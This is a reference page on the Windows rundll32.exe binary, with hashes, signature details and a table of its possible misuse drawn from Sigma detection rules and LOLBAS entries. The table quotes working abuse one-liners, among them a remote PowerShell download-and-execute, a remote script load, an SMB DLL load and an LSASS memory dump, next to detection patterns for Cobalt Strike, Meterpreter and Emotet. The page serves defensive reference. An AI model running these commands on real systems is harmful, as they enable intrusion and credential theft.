rundll32.exe
- File Path:
C:\Windows\system32\rundll32.exe - Description: Windows host process (Rundll32)
Hashes
| Type | Hash |
|---|---|
| MD5 | 44B041922105E01BFD0D096123F7D312 |
| SHA1 | 84DDB2B3D1158485B2B66867CA9452930A258EDD |
| SHA256 | F1DC9560D0C381C78304D94F7BA469490017D9728A03C2DD32C3BE957FC9F923 |
| SHA384 | 825A5C8D7265D3F77D49E270F1D1A0F564C3FF23DC755B8FF86FDE698BF89B0311E28C51A3CE790284B72A342492722A |
| SHA512 | F8EC1BAB25EBB3107AAF59CF687E043ABF33A2839B4F5557197472BE18F0AB3788878417E724456BF9D30E237BBA9179AB87803EC410F0F9A5C68631F8F17180 |
| SSDEEP | 1536:OM81xna/qB3NhUNfkze1+yWiYcWUoBmtSWRuln5IUmDjoX:l7/o3NhOfk7y7YsdtpRuln5I |
| IMP | 4DB27267734D1576D75C991DC70F68AC |
| PESHA1 | 0689A2BEDC094FE12F3C0517C0991DD7F842B2C6 |
| PE256 | 335ED9EB6223407990A540AA4136E7D75CD41E3A50A016CD746A98FAF967F817 |
Runtime Data
Loaded Modules:
| Path |
|---|
| C:\Windows\System32\combase.dll |
| C:\Windows\System32\imagehlp.dll |
| C:\Windows\System32\KERNEL32.DLL |
| C:\Windows\System32\KERNELBASE.dll |
| C:\Windows\System32\msvcrt.dll |
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\System32\RPCRT4.dll |
| C:\Windows\system32\rundll32.exe |
| C:\Windows\System32\shcore.dll |
| C:\Windows\System32\ucrtbase.dll |
Signature
- Status: Signature verified.
- Serial:
3300000266BD1580EFA75CD6D3000000000266 - Thumbprint:
A4341B9FD50FB9964283220A36A1EF6F6FAA7840 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: RUNDLL32.EXE.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/76
- VirusTotal Link: https://www.virustotal.com/gui/file/f1dc9560d0c381c78304d94f7ba469490017d9728a03c2dd32c3be957fc9f923/detection
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of rundll32.exe being misused. While rundll32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | win_invoke_obfuscation_via_rundll_services_security.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_rundll32_services_security.yml | title: Invoke-Obfuscation Via Use Rundll32 |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_rundll32_services_security.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_rundll32_services_security.yml | - 'rundll32' |
DRL 1.0 |
| sigma | win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn |
DRL 1.0 |
| sigma | win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml | - 'rundll32' |
DRL 1.0 |
| sigma | win_user_driver_loaded.yml | - '\Windows\System32\rundll32.exe' |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_rundll_services.yml | ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_rundll32_services.yml | title: Invoke-Obfuscation Via Use Rundll32 |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_rundll32_services.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts |
DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_rundll32_services.yml | ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' |
DRL 1.0 |
| sigma | win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn |
DRL 1.0 |
| sigma | win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | - 'rundll32' |
DRL 1.0 |
| sigma | sysmon_susp_powershell_rundll32.yml | title: PowerShell Rundll32 Remote Thread Creation |
DRL 1.0 |
| sigma | sysmon_susp_powershell_rundll32.yml | description: Detects PowerShell remote thread creation in Rundll32.exe |
DRL 1.0 |
| sigma | sysmon_susp_powershell_rundll32.yml | TargetImage\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn |
DRL 1.0 |
| sigma | driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | - 'rundll32' |
DRL 1.0 |
| sigma | file_event_win_creation_system_file.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | file_event_win_susp_clr_logs.yml | - 'rundll32' |
DRL 1.0 |
| sigma | file_event_win_susp_clr_logs.yml | - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process |
DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | # - '\rundll32.exe' |
DRL 1.0 |
| sigma | image_load_mimikatz_inmemory_detection.yml | Image: 'C:\Windows\System32\rundll32.exe' |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | net_connection_win_rundll32_net_connections.yml | title: Rundll32 Internet Connection |
DRL 1.0 |
| sigma | net_connection_win_rundll32_net_connections.yml | description: Detects a rundll32 that communicates with public IP addresses |
DRL 1.0 |
| sigma | net_connection_win_rundll32_net_connections.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_rundll.yml | Payload\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' |
DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_rundll32.yml | title: Invoke-Obfuscation Via Use Rundll32 |
DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_rundll32.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts |
DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_rundll32.yml | Payload\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' |
DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_rundll.yml | ScriptBlockText\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' |
DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_rundll32.yml | title: Invoke-Obfuscation Via Use Rundll32 |
DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_rundll32.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts |
DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_rundll32.yml | ScriptBlockText\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' |
DRL 1.0 |
| sigma | posh_ps_suspicious_keywords.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. |
DRL 1.0 |
| sigma | proc_access_win_lsass_dump_comsvcs_dll.yml | SourceImage: 'C:\Windows\System32\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_equationgroup_dll_u_load.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_activity_apr21.yml | - 'C:\Windows\System32\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_loader.yml | - 'rundll32.exe ' |
DRL 1.0 |
| sigma | proc_creation_win_apt_sofacy.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_taidoor.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_unc2452_cmds.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_unc2452_cmds.yml | ParentImage\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_unc2452_cmds.yml | - 'rundll32 c:\windows\' |
DRL 1.0 |
| sigma | proc_creation_win_apt_unc2452_ps.yml | - 'rundll32 c:\windows' |
DRL 1.0 |
| sigma | proc_creation_win_apt_unc2452_ps.yml | - 'process call create "rundll32 c:\windows' |
DRL 1.0 |
| sigma | proc_creation_win_apt_zxshell.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_bad_opsec_sacrificial_processes.yml | CommandLine\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_c3_load_by_rundll32.yml | title: F-Secure C3 Load by Rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_c3_load_by_rundll32.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_load_by_rundll32.yml | title: CobaltStrike Load by Rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_load_by_rundll32.yml | description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_load_by_rundll32.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_crime_fireball.yml | description: Detects Archer malware invocation via rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_crime_fireball.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_html_help_spawn.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe |
DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_rundll.yml | CommandLine\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' |
DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_rundll32.yml | title: Invoke-Obfuscation Via Use Rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_rundll32.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts |
DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_rundll32.yml | CommandLine\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' |
DRL 1.0 |
| sigma | proc_creation_win_lolbins_by_office_applications.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_lolbins_with_wmiprvse_parent_process.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_malware_notpetya.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_malware_trickbot_wermgr.yml | description: Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe |
DRL 1.0 |
| sigma | proc_creation_win_malware_trickbot_wermgr.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn |
DRL 1.0 |
| sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - '*rundll32*' |
DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | # - '\rundll32.exe' # see comment below |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | # Several FPs with rundll32.exe - we started excluding specific use cases and |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | # ended commenting out all rundll32.exe sub processes |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | # Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_powershell_dll_execution.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_powershell_dll_execution.yml | - 'Windows-Hostprozess (Rundll32)' |
DRL 1.0 |
| sigma | proc_creation_win_process_dump_rundll32_comsvcs.yml | title: Process Dump via Rundll32 and Comsvcs.dll |
DRL 1.0 |
| sigma | proc_creation_win_process_dump_rundll32_comsvcs.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_redmimicry_winnti_proc.yml | - rundll32.exe |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_not_from_c_drive.yml | title: Rundll32 From Abnormal Drive |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_not_from_c_drive.yml | description: Detects rundll32.exe executing from an abnormal drive such as a mounted ISO. |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_not_from_c_drive.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_registered_com_objects.yml | title: Rundll32 Registered COM Objects |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_registered_com_objects.yml | - https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_registered_com_objects.yml | Image\|endswith: \rundll32.exe |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_without_parameters.yml | title: Rundll32 Without Parameters |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_without_parameters.yml | description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module |
DRL 1.0 |
| sigma | proc_creation_win_rundll32_without_parameters.yml | CommandLine: 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_run_executable_invalid_extension.yml | description: Detects the execution of rundll32 with a command line that doesn't contain a .dll file |
DRL 1.0 |
| sigma | proc_creation_win_run_executable_invalid_extension.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_susp_program.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_child_process_as_system_.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_comsvcs_procdump.yml | description: Detects process memory dump via comsvcs.dll and rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_susp_comsvcs_procdump.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_comsvcs_procdump.yml | OriginalFileName: 'RUNDLL32.EXE' |
DRL 1.0 |
| sigma | proc_creation_win_susp_control_dll_load.yml | description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits |
DRL 1.0 |
| sigma | proc_creation_win_susp_control_dll_load.yml | Image\|endswith: '\rundll32.exe ' |
DRL 1.0 |
| sigma | proc_creation_win_susp_curl_start_combo.yml | - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 |
DRL 1.0 |
| sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | title: Emotet RunDLL32 Process Creation |
DRL 1.0 |
| sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL |
DRL 1.0 |
| sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_emotet_rundll32_execution.yml | - '\tracker.exe' #When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_odbcconf.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_pcwutl.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_activity.yml | title: Suspicious Rundll32 Activity |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_activity.yml | description: Detects suspicious process related to rundll32 based on arguments |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_by_ordinal.yml | description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_by_ordinal.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_inline_vbs.yml | title: Suspicious Rundll32 Invoking Inline VBScript |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_inline_vbs.yml | description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_inline_vbs.yml | - 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_js_runhtmlapplication.yml | title: Rundll32 JS RunHTMLApplication Pattern |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_js_runhtmlapplication.yml | description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_js_runhtmlapplication.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_no_params.yml | title: Suspicious Rundll32 Without Any CommandLine Params |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_no_params.yml | description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_no_params.yml | CommandLine\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_script_run.yml | title: Suspicious Rundll32 Script in CommandLine |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_script_run.yml | description: Detects suspicious process related to rundll32 based on arguments |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_script_run.yml | - rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | title: Suspicious Rundll32 Setupapi.dll Activity |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | ParentImage\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_sys.yml | title: Suspicious Rundll32 Activity Invoking Sys File |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_sys.yml | description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 |
DRL 1.0 |
| sigma | proc_creation_win_susp_rundll32_sys.yml | CommandLine\|contains: 'rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shimcache_flush.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | Image\|endswith: \rundll32.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | CommandLine\|endswith: rundll32.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_target_location_shell32.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_webdav_client_execution.yml | description: A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server). |
DRL 1.0 |
| sigma | proc_creation_win_susp_webdav_client_execution.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_wmic_proc_create_rundll32.yml | title: Suspicious WMI Execution Using Rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_susp_wmic_proc_create_rundll32.yml | description: Detects WMI executing rundll32 |
DRL 1.0 |
| sigma | proc_creation_win_susp_wmic_proc_create_rundll32.yml | - 'rundll32' |
DRL 1.0 |
| sigma | proc_creation_win_system_exe_anomaly.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | proc_creation_win_vmtoolsd_susp_child_process.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | registry_event_modify_screensaver_binary_path.yml | - '\rundll32.exe' |
DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_rundll_services.yml | ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' |
DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_rundll32_services.yml | title: Invoke-Obfuscation Via Use Rundll32 |
DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_rundll32_services.yml | description: Detects Obfuscated Powershell via use Rundll32 in Scripts |
DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_rundll32_services.yml | ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' |
DRL 1.0 |
| sigma | win_possible_privilege_escalation_using_rotten_potato.yml | Image\|endswith: '\rundll32.exe' |
DRL 1.0 |
| LOLBAS | Dfsvc.yml | - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo |
|
| LOLBAS | Rundll32.yml | Name: Rundll32.exe |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe AllTheThingsx64,EntryPoint |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. |
|
| LOLBAS | Rundll32.yml | - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). |
|
| LOLBAS | Rundll32.yml | - Command: rundll32.exe -sta {CLSID} |
|
| LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. |
|
| LOLBAS | Rundll32.yml | - Path: C:\Windows\System32\rundll32.exe |
|
| LOLBAS | Rundll32.yml | - Path: C:\Windows\SysWOW64\rundll32.exe |
|
| LOLBAS | Rundll32.yml | - IOC: Outbount Internet/network connections made from rundll32 |
|
| LOLBAS | Rundll32.yml | - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ |
|
| LOLBAS | Rundll32.yml | - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md |
|
| LOLBAS | Rundll32.yml | - Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 |
|
| LOLBAS | Advpack.yml | Description: Utility for installing software and drivers with rundll32.exe |
|
| LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, |
|
| LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, |
|
| LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX test.dll |
|
| LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe |
|
| LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | comsvcs.yml | - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" |
|
| LOLBAS | Dfshim.yml | - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Ieframe.yml | - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" |
|
| LOLBAS | Mshtml.yml | - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" |
|
| LOLBAS | Pcwutl.yml | - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
|
| LOLBAS | Pcwutl.yml | - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ |
|
| LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf |
|
| LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf |
|
| LOLBAS | Shdocvw.yml | - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" |
|
| LOLBAS | Shell32.yml | - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll |
|
| LOLBAS | Shell32.yml | - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe |
|
| LOLBAS | Shell32.yml | - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" |
|
| LOLBAS | Syssetup.yml | - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf |
|
| LOLBAS | Syssetup.yml | - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" |
|
